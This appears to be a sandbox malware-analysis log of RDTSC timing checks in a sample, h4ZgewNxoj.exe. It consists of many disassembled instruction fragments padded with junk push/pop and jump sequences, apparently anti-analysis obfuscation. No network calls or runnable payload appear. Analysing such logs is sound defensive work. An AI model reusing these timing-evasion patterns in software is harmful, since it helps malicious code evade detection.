Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B92C86 second address: B92CA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B92CA8 second address: B92CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B92CAE second address: B92CC5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FDFF9160A31h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BA28B1 second address: BA28BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BA4187 second address: BA418B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC65BD second address: BC65C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC65C6 second address: BC65CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC65CC second address: BC65E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FDFF8F79156h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FDFF8F79156h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC65E1 second address: BC6603 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDFF9160A38h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC6603 second address: BC6607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC6607 second address: BC660B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC68EB second address: BC68EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC68EF second address: BC68F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC6A4D second address: BC6A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDFF8F79165h 0x00000009 jo 00007FDFF8F79156h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC6A6E second address: BC6A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC6A73 second address: BC6A83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FDFF8F79156h 0x0000000a ja 00007FDFF8F79156h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC6BF2 second address: BC6C09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC6C09 second address: BC6C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC6EEA second address: BC6F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007FDFF9160A35h 0x0000000c jnp 00007FDFF9160A3Ch 0x00000012 popad 0x00000013 js 00007FDFF9160A50h 0x00000019 pushad 0x0000001a je 00007FDFF9160A26h 0x00000020 push edi 0x00000021 pop edi 0x00000022 popad 0x00000023 pushad 0x00000024 jmp 00007FDFF9160A38h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC737F second address: BC7387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC7387 second address: BC73A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FDFF9160A26h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FDFF9160A26h 0x00000013 jp 00007FDFF9160A26h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC73A0 second address: BC73A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC74C5 second address: BC74C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC74C9 second address: BC74CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC9008 second address: BC900C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC900C second address: BC9012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC9012 second address: BC901C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FDFF9160A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BC901C second address: BC9020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BCA63C second address: BCA655 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FDFF9160A2Ah 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BCBE0F second address: BCBE13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BCE750 second address: BCE756 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BCE756 second address: BCE75C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BCE75C second address: BCE760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BCE8C4 second address: BCE8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BCE8C8 second address: BCE8CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BCEC84 second address: BCEC8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BCEC8A second address: BCEC95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BD05B4 second address: BD05D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FDFF8F79165h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BD05D8 second address: BD05E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: BD05E0 second address: BD05F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007FDFF8F7915Ch 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA02E4 second address: 4CA030B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDFF9160A35h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA030B second address: 4CA031B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDFF8F7915Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA031B second address: 4CA032B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA032B second address: 4CA032F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA032F second address: 4CA0335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0335 second address: 4CA033B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA033B second address: 4CA033F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA033F second address: 4CA0343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0343 second address: 4CA0352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0352 second address: 4CA0356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0356 second address: 4CA035A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA035A second address: 4CA0360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA041D second address: 4CA0421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0421 second address: 4CA043E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA043E second address: 4CA045A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA045A second address: 4CA045E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA045E second address: 4CA0462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0462 second address: 4CA0468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0468 second address: 4CA04C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDFF9160A30h 0x00000008 push eax 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FDFF9160A37h 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FDFF9160A32h 0x0000001c adc ecx, 2C39AFC8h 0x00000022 jmp 00007FDFF9160A2Bh 0x00000027 popfd 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA04C2 second address: 4CA0515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 pushad 0x00000009 pushad 0x0000000a mov ecx, ebx 0x0000000c pushfd 0x0000000d jmp 00007FDFF8F79163h 0x00000012 xor ah, FFFFFFBEh 0x00000015 jmp 00007FDFF8F79169h 0x0000001a popfd 0x0000001b popad 0x0000001c popad 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FDFF8F7915Fh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0515 second address: 4CA051B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA05BF second address: 4CA05E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b jmp 00007FDFF8F79164h 0x00000010 mov esi, edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA05E6 second address: 4CA05EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA05EC second address: 4CA0614 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79164h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov al, byte ptr [edx] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDFF8F7915Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0614 second address: 4CA0623 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0623 second address: 4CA06A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 pushfd 0x00000006 jmp 00007FDFF8F7915Bh 0x0000000b sub esi, 480E9F1Eh 0x00000011 jmp 00007FDFF8F79169h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a inc edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FDFF8F79163h 0x00000024 sbb ax, 892Eh 0x00000029 jmp 00007FDFF8F79169h 0x0000002e popfd 0x0000002f call 00007FDFF8F79160h 0x00000034 pop eax 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA06A0 second address: 4CA06DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FDFF9160A2Ch 0x0000000b jmp 00007FDFF9160A35h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 test al, al 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FDFF9160A2Dh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA06DC second address: 4CA0614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDFF8F79167h 0x00000008 push esi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jne 00007FDFF8F79059h 0x00000013 mov al, byte ptr [edx] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FDFF8F7915Ah 0x0000001e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0707 second address: 4CA070B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA070B second address: 4CA070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA070F second address: 4CA0715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0715 second address: 4CA076B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007FDFF8F79160h 0x0000000b xor eax, 0AD4C0F8h 0x00000011 jmp 00007FDFF8F7915Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a sub edx, esi 0x0000001c jmp 00007FDFF8F7915Fh 0x00000021 mov edi, dword ptr [ebp+08h] 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FDFF8F79165h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA076B second address: 4CA0771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0771 second address: 4CA0775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0775 second address: 4CA07A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 dec edi 0x00000009 jmp 00007FDFF9160A2Fh 0x0000000e lea ebx, dword ptr [edi+01h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FDFF9160A30h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA07A4 second address: 4CA07AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA07AA second address: 4CA07D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov al, byte ptr [edi+01h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDFF9160A37h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA07D8 second address: 4CA07EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov dx, 1466h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c inc edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA07EB second address: 4CA0801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0801 second address: 4CA0877 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov dl, FCh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test al, al 0x0000000c jmp 00007FDFF8F79164h 0x00000011 jne 00007FE069BF13B4h 0x00000017 pushad 0x00000018 mov bx, cx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FDFF8F79168h 0x00000022 or si, A8C8h 0x00000027 jmp 00007FDFF8F7915Bh 0x0000002c popfd 0x0000002d mov ebx, ecx 0x0000002f popad 0x00000030 popad 0x00000031 mov ecx, edx 0x00000033 jmp 00007FDFF8F79162h 0x00000038 shr ecx, 02h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0877 second address: 4CA087B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA087B second address: 4CA0881 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0881 second address: 4CA0904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 movzx eax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rep movsd 0x0000000e rep movsd 0x00000010 rep movsd 0x00000012 rep movsd 0x00000014 rep movsd 0x00000016 pushad 0x00000017 push edi 0x00000018 pushfd 0x00000019 jmp 00007FDFF9160A32h 0x0000001e add cx, 38B8h 0x00000023 jmp 00007FDFF9160A2Bh 0x00000028 popfd 0x00000029 pop eax 0x0000002a pushad 0x0000002b call 00007FDFF9160A2Fh 0x00000030 pop eax 0x00000031 call 00007FDFF9160A39h 0x00000036 pop esi 0x00000037 popad 0x00000038 popad 0x00000039 mov ecx, edx 0x0000003b jmp 00007FDFF9160A37h 0x00000040 and ecx, 03h 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 mov edi, ecx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0904 second address: 4CA0933 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bx, cx 0x00000009 popad 0x0000000a rep movsb 0x0000000c jmp 00007FDFF8F79166h 0x00000011 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0933 second address: 4CA0937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0937 second address: 4CA093D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
